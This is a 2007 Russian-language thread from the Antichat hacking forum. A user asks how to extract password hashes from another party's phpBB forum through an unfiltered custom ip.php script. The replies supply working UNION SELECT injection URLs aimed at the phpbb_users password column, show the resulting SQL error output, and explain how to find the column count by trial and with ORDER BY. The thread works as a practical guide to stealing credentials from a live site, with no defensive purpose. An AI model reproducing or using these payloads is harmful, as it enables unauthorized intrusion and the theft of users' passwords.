Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Елементарная sql-иньекция |
24.12.2007, 05:06
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 7
Провел на форуме:
26022
Репутация:
0
|
|
Елементарная sql-иньекция
Проблема такая, на одном форуме phpbb есть самописаный скрипт каторый может проверять юзеров на сходство по ИП. В таблеце phpbb_users в какойто колонке сохраняется последний ИП юзера с каторого он заходил, но в етом скрипте нет никакой фильтрации, например, если я хочу узнать у каво из посетителей пароль "123123", тогда мне нужно зделать так /ip.php?id=0+union+select+*+from+phpbb_users+where+ user_password='4297f44b13955235245b2497399d7a93' и т.д. Сам скрипт выдает только ид/ник/ип юзера и все, как можно пробить пароль юзера по id?
Последний раз редактировалось n01038; 24.12.2007 в 05:08..
|
|
|
24.12.2007, 05:16
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
/ip.php?id=0+union+select+1,user_password,3,4+from+ phpbb_users+where+user_id=1
с учётом того что 4 колонки, вторая выводящая
__________________
|
|
|
|
24.12.2007, 05:30
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 7
Провел на форуме:
26022
Репутация:
0
|
|
Сообщение от +toxa+
/ip.php?id=0+union+select+1,user_password,3,4+from+ phpbb_users+where+user_id=1
с учётом того что 4 колонки, вторая выводящая
Вот так скрипт ответил :
Could not query attachment informations
DEBUG MODE
SQL Error : 1222 The used SELECT statements have a different number of columns
SELECT * FROM phpbb_users WHERE user_id = 0 union select 1,user_password,3,4 from phpbb_users where user_id=1
Line : 51
File : ip.php
|
|
|
|
24.12.2007, 05:41
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
число колонок подбирай...
union select 1,2,3 и так далее/* пока не подберешь число колонок..
Как подберешь смотри какие из них выводятся…
Последний раз редактировалось aka PSIH; 24.12.2007 в 05:48..
|
|
|
|
24.12.2007, 06:03
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 7
Провел на форуме:
26022
Репутация:
0
|
|
уже до 100 дошел, значит здесь либо много колонок либо я делаю чтото нетак
|
|
|
|
24.12.2007, 06:48
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 7
Провел на форуме:
26022
Репутация:
0
|
|
ужас, 132 колонки было, спасибо запомошь всем кто отписался  |
|
|
|
24.12.2007, 07:04
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
n01038
Не обязательно было все 132 колонки перебирать..
можно было быстро и просто через order by & group by подобрать 
|
|
|
|
24.12.2007, 09:05
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 7
Провел на форуме:
26022
Репутация:
0
|
|
Сообщение от aka PSIH
n01038
Не обязательно было все 132 колонки перебирать..
можно было быстро и просто через order by & group by подобрать
можно по подробней?
|
|
|
|
24.12.2007, 11:00
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307
Репутация:
114
|
|
набиаешь например /ip.php?id=0+order+by+100/*, если ошибка появилась значит число колонок меньше 100, если не появилась значить больше или равно 100...
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [aywo]](/avatars/avatar32504.gif){kind=avatar}
Похожие темы
Линейный вид
